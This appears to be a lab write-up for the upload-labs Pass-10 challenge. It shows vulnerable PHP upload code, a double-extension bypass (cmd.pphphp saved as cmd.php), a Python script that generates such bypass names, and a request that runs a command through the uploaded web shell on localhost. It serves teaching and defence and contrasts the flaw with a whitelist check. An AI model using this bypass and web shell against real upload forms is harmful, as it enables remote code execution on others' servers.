This post covers Pass-10. The backend does not validate the extension at all; instead it strips every blacklisted extension out of the file name by replacing it with the empty string.
Here is the server-side code:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        // Blacklist of extensions; note it is only a list of substrings to remove
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        // Each blacklist entry is removed once, in array order, case-insensitively;
        // the result is not rescanned, which is what the double-write bypass relies on
        $file_name = str_ireplace($deny_ext,"", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = 'Upload error!';
        }
    } else {
        $msg = UPLOAD_PATH . ' folder does not exist, please create it manually!';
    }
}
The code removes every substring of the file name that matches a blacklisted extension, then saves the file under whatever is left. At first glance everything dangerous is gone, but the removal is a single pass: str_ireplace deletes each match and does not rescan the result, so a "double-written" extension survives. Sanitizing by replacement is fundamentally different from rejecting the upload as soon as a blacklisted extension is found.
Upload a file named cmd.pphphp. The three consecutive characters php in the middle are removed, and the characters on either side of them join up to form a new php, so the saved file name becomes cmd.php.
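The following Python script is an added illustration, not code from upload-labs or from the original post. It models PHP's str_ireplace semantics (each blacklist entry applied in array order, case-insensitively, left to right, non-overlapping, with no rescan of the result), uses that model to search for a double-write payload for any target extension, and contrasts the replace-and-save logic with a whitelist check on the final extension. The function names, the image whitelist in allow_upload and the way payload candidates are generated are my own choices and not part of the original challenge.

```python
import re

# Blacklist copied from the Pass-10 source, in the same order
DENY_EXT = ["php", "php5", "php4", "php3", "php2", "html", "htm", "phtml", "pht",
            "jsp", "jspa", "jspx", "jsw", "jsv", "jspf", "jtml", "asp", "aspx",
            "asa", "asax", "ascx", "ashx", "asmx", "cer", "swf", "htaccess"]


def str_ireplace(search, replace, subject):
    """Model of PHP str_ireplace(array $search, string $replace, string $subject).

    Every needle is applied in array order; each application removes all
    case-insensitive, left-to-right, non-overlapping matches and the output is
    NOT rescanned for that needle. That single-pass behaviour is the bug.
    """
    for needle in search:
        subject = re.sub(re.escape(needle), replace, subject, flags=re.IGNORECASE)
    return subject


def pass10_sanitize(file_name):
    """What the challenge does to the uploaded name before move_uploaded_file()."""
    return str_ireplace(DENY_EXT, "", file_name.strip())


def find_double_write(ext, base="cmd"):
    """Search for a double-write payload that the sanitizer turns into base.ext.

    Candidates insert the full extension inside itself at every interior
    position (for 'php': 'pphphp', 'phphp' ...). Each candidate is verified
    against the sanitizer model, because another blacklist entry may also
    chew on the payload (e.g. 'html' inside a doubled 'phtml').
    Returns the payload extension, or None if no single insertion works.
    """
    for i in range(1, len(ext)):
        candidate = ext[:i] + ext + ext[i:]
        if pass10_sanitize(f"{base}.{candidate}") == f"{base}.{ext}":
            return candidate
    return None


# Hardened alternative: decide on the real final extension and reject,
# never rewrite the name. (Whitelist chosen for illustration.)
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}


def allow_upload(file_name):
    """Accept only names whose last extension is in the whitelist."""
    name = file_name.strip()
    if "." not in name:
        return False
    ext = name.rsplit(".", 1)[1].lower()
    return ext in ALLOWED_EXT


if __name__ == "__main__":
    # Constructed sample names, not captured upload traffic
    for name in ["cmd.php", "cmd.pphphp", "cmd.PhP", "shell.phtml"]:
        print(f"{name:12} -> saved as {pass10_sanitize(name)!r}, "
              f"whitelist says {allow_upload(name)}")
    print("double-write for php:  ", find_double_write("php"))
    print("double-write for phtml:", find_double_write("phtml"))
```

Running it shows that cmd.pphphp is stored as cmd.php, that the same trick does not work for phtml because the later html entry removes both halves, and that a whitelist on the final extension rejects every variant regardless of how the name is padded.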
Visit http://localhost/upload/cmd.php?cmd=echo%201;
The page displays
1
so the uploaded script executed successfully.